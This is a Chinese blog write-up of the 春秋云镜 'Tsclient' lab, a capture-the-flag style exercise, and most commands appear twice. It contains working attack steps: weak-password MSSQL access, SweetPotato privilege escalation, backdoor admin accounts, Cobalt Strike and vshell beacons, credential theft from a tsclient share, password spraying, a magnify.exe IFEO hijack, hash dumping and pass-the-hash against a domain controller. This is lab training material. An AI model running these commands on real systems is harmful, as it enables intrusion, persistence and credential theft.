文章导读

春秋云镜-Tsclient

zzdzz 2025年12月3日 195

参考文章

https://blog.csdn.net/uuzeray/article/details/141406072
https://fushuling.com/index.php/2023/08/29/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7tsclient/

https://blog.csdn.net/uuzeray/article/details/141406072
https://fushuling.com/index.php/2023/08/29/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7tsclient/

入口机

39.98.110.43

fscan扫

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.98.110.43

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.110.43:80 open
39.98.110.43:1433 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.110.43       code:200 len:703    title:IIS Windows Server
[+] mssql 39.98.110.43:1433:sa 1qaz!QAZ
已完成 2/2
[*] 扫描结束,耗时: 17.3406031s
PS G:\tool\护网\工具打包>

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.98.110.43

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.110.43:80 open
39.98.110.43:1433 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.110.43       code:200 len:703    title:IIS Windows Server
[+] mssql 39.98.110.43:1433:sa 1qaz!QAZ
已完成 2/2
[*] 扫描结束,耗时: 17.3406031s
PS G:\tool\护网\工具打包>

直接扫出了mssql的弱口令

用MDUT工具

命令执行成功，不过权比较低

上传SweetPotato提权

C:/Users/Public/SweetPotato.exe -a whoami

C:/Users/Public/SweetPotato.exe -a whoami

直接添加用户

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

flag01: flag{e470b873-fe1a-41a6-a6b9-1694f1c64659}

flag01: flag{e470b873-fe1a-41a6-a6b9-1694f1c64659}

搞一个cs马

https://blog.csdn.net/m0_72634167/article/details/136705881

成功上线

flag02

查看在线用户

shell quser || qwinst

shell quser || qwinst

发现还有一个john

有在线用户可以用CS注入进程上线

Cobalt Strike进程注入-CSDN博客

选择john的进程注入，需要换一个监听端口

用John查看共享资源

shell net use

shell net use

shell dir \\tsclient\c

shell dir \\tsclient\c

shell type \\tsclient\c\credential.txt

shell type \\tsclient\c\credential.txt

拿到一套账密，并提示打映像劫持

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

vshell上线，传fscan扫内网，隧道代理

fscan扫

C:\Users\Public>fscan322.exe -h 172.22.8.1/24 -o 1.txt

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.8.18     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.46     is alive
[*] Icmp alive hosts len is: 4
172.22.8.31:139 open
172.22.8.31:135 open
172.22.8.15:139 open
172.22.8.15:88 open
172.22.8.46:135 open
172.22.8.18:139 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] NetInfo
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01
[*] NetInfo
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT
[*] NetInfo
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
已完成 16/16
[*] 扫描结束,耗时: 10.0570642s

C:\Users\Public>fscan322.exe -h 172.22.8.1/24 -o 1.txt

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.8.18     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.46     is alive
[*] Icmp alive hosts len is: 4
172.22.8.31:139 open
172.22.8.31:135 open
172.22.8.15:139 open
172.22.8.15:88 open
172.22.8.46:135 open
172.22.8.18:139 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] NetInfo
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01
[*] NetInfo
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT
[*] NetInfo
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
已完成 16/16
[*] 扫描结束,耗时: 10.0570642s

喷洒密码

proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

提示STATUS_PASSWORD_EXPIRED也就是密码过期了，需要使用smbpasswd进行修改密码

proxychains python smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'qwer1234@'

proxychains python smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'qwer1234@'

有3台，但只有172.22.8.46可以连接，建议直接改46的密码，修改别的可能也会影响环境？

很神奇，改密码报错，但是kali能登

windows本机不行

选择用放大镜提权

映像劫持的几种利用方式 – FreeBuf网络安全行业门户

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后锁定，打开放大镜

kali太卡了，什么都别说先加用户

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

舒服

flag02: flag{1be77e66-7a95-42e7-be95-bd350410a351}

flag02: flag{1be77e66-7a95-42e7-be95-bd350410a351}

不出网转发上线CS

不出网主机上线到CobaltStrike的方式_cs转发上线模块-CSDN博客

172.22.8.46不出网，用172.22.8.18转发上线CS

点击选择转发上线

在用这个监听器生成马

成功上线

不能用自己的账号，不然执行不了命令，我绷不住了，还是要用放大镜

查看域管理员

shell net group "domain admins" /domain

shell net group "domain admins" /domain

抓取密码

logonpasswords

logonpasswords

9db12c576e024e5dd17976e20cfa7157

9db12c576e024e5dd17976e20cfa7157

用PTH打DC，读到flag3

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 9db12c576e024e5dd17976e20cfa7157 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 9db12c576e024e5dd17976e20cfa7157 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"

flag03: flag{27897fa3-0ab9-4b45-af90-980d82d15030}

flag03: flag{27897fa3-0ab9-4b45-af90-980d82d15030}

评论（已关闭）

评论已关闭

Hello! 欢迎来到zz的小站！

加载中

春秋云镜-Tsclient

参考文章

入口机

flag02

不出网转发上线CS

评论（已关闭）